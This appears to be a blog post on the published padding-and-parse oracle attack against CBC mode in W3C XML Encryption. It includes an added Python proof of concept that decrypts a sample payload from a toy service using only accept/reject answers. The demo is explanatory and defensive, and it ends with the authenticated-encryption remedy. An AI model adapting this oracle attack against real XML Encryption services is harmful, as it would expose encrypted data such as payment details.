Extensible Markup Language (XML) is the industry standard format for storing and transporting structured data. As a fundamental web services component, it allows content to be processed and exchanged across different applications, hardware, and operating systems with minimal human intervention. XML Encryption, the W3C Recommendation that defines how individual XML elements and their content are encrypted, was standardized by the World Wide Web Consortium (W3C) in December 2002, and is used by major companies such as Microsoft and IBM in their XML and web services frameworks.
Two researchers from the Ruhr University Bochum, Tibor Jager and Juraj Somorovsky, recently demonstrated that the XML Encryption standard is not as secure as assumed. They showed a practical chosen-ciphertext attack against the standard's cipher block chaining (CBC) mode. CBC ciphertexts are malleable (flipping a bit in one ciphertext block flips the same bit in the next plaintext block) and XML Encryption adds no integrity check, so a web service that decrypts an attacker-modified ciphertext and then tries to parse the result behaves differently depending on whether the modified plaintext is still well-formed XML. That difference, whether an error message or just a distinguishable response, is an oracle that lets the attacker recover the plaintext one byte at a time, with roughly 14 requests per plaintext byte on average. The attack was tested against a popular open source implementation of XML Encryption, as well as against the implementations of companies that responded to the responsible disclosure. The result: the attack works, and XML Encryption as deployed is not secure.
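The attack described above, as an added example that is not part of the original post or of the researchers' code: a toy decrypting service that applies XML Encryption's padding rule (only the last octet, the padding count, is checked) and then parses the result, and an attacker that uses nothing but the service's accept/reject answer to recover the plaintext. The block cipher is a constructed SHA-256 Feistel stand-in for AES, chosen so the example runs with the standard library alone; the attack does not depend on it. The sample key and the card-number payload are constructed. This naive version spends up to 256 oracle queries per byte; the published attack needs far fewer, but the leak it exploits is the same.

```python
import hashlib
import xml.etree.ElementTree as ET

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    # Round function of the constructed Feistel block cipher (stand-in for AES).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, plaintext):
    # XML Encryption padding: 1..16 octets; only the last one (the count) is meaningful.
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes(n - 1) + bytes([n])
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)
        prev = blk
    n = out[-1]
    if not 1 <= n <= BLOCK:  # the only check the standard prescribes; there is no integrity check
        raise ValueError("bad padding")
    return out[:-n]

def well_formed(payload):
    # What the service does after decrypting: decode UTF-8 and parse the element content.
    try:
        ET.fromstring("<r>" + payload.decode("utf-8") + "</r>")
        return True
    except (ValueError, ET.ParseError):  # UnicodeDecodeError is a ValueError
        return False

class Service:
    """Decrypting endpoint. The attacker only sees accepted vs. rejected."""
    def __init__(self, key):
        self.key = key

    def accepts(self, iv, ciphertext):
        try:
            return well_formed(cbc_decrypt(self.key, iv, ciphertext))
        except ValueError:
            return False

def recover_block(oracle, prev, target):
    """Recover plaintext block P_i from (C_{i-1}, C_i) using one-block queries (iv', C_i)."""
    plain = [0] * BLOCK
    # Step 1: find the mask that makes the last byte 16 (padding 16 = empty payload, always
    # accepted). For any shorter padding byte 0 is payload, and cycling its top two bits hits
    # a 0x80..0xBF value, which cannot start a UTF-8 sequence, so one of the four queries fails.
    for m in range(256):
        tail = bytes(BLOCK - 2) + bytes([m])
        if all(oracle(_xor(prev, bytes([top]) + tail), target) for top in (0, 0x40, 0x80, 0xC0)):
            plain[BLOCK - 1] = m ^ BLOCK
            break
    else:
        raise RuntimeError("padding mask not found")
    # Step 2: bytes 0..14 left to right. Padding length 15-j makes bytes 0..j the payload;
    # recovered bytes are masked to 'a', so byte j alone decides accept/reject, and the
    # accepted masks are exactly P[j] xor {v : payload 'a'*j + v parses}.
    for j in range(BLOCK - 1):
        prefix = b"a" * j
        good = {v for v in range(256) if well_formed(prefix + bytes([v]))}
        mask = bytearray(BLOCK)
        for i in range(j):
            mask[i] = plain[i] ^ ord("a")
        mask[BLOCK - 1] = plain[BLOCK - 1] ^ (BLOCK - 1 - j)
        accepted = set()
        for m in range(256):
            mask[j] = m
            if oracle(_xor(prev, mask), target):
                accepted.add(m)
        cands = [x for x in range(256) if {x ^ m for m in accepted} == good]
        if len(cands) != 1:
            raise RuntimeError("oracle inconsistent")
        plain[j] = cands[0]
    return bytes(plain)

def recover_plaintext(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    padded = b"".join(recover_block(oracle, blocks[k - 1], blocks[k]) for k in range(1, len(blocks)))
    return padded[:-padded[-1]]

if __name__ == "__main__":
    svc = Service(b"constructed-key!")                        # constructed 16-byte key
    secret = b"<Card><PAN>4111111111111111</PAN></Card>"      # constructed sample payload
    iv = bytes(range(BLOCK))
    ct = cbc_encrypt(svc.key, iv, secret)
    print(recover_plaintext(svc.accepts, iv, ct))
```

Note that the attacker never touches the key and never needs the service's error text: `Service.accepts` returns only a boolean, which is all a real deployment leaks when the SOAP fault for "bad padding or unparsable plaintext" differs from the normal response. Suppressing the fault does not close the oracle either, since the parse failure still changes timing and downstream behaviour; only authenticating the ciphertext before decrypting does.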
So how do we fix this issue? Unfortunately there is no simple patch: the weakness is in the standard itself, which specifies CBC encryption with no integrity protection, rather than in one buggy implementation. Hiding the error message does not help, because the parse failure still shows up in timing and in how the service behaves afterwards. The researchers propose changing the standard at the earliest opportunity to an authenticated encryption mode (XML Encryption 1.1 later added AES-GCM for exactly this reason, keeping the CBC algorithms only for backward compatibility). They have informed all companies they could identify as affected and have also had intensive discussions on workarounds with a few of them.
Given the magnitude of the above news and the number of companies involved, there may be a fix soon. Nevertheless this has done "lasting damage" to distributed computing. It's going to be "Hello IBM! bye bye Silicon Valley". This may sound alarmist, but when security infrastructure, and a "security standard" that was supposedly verified and checked at that, turns out to be broken, damage is done. My sense of security with XML/HTTP technologies has certainly diminished after this event.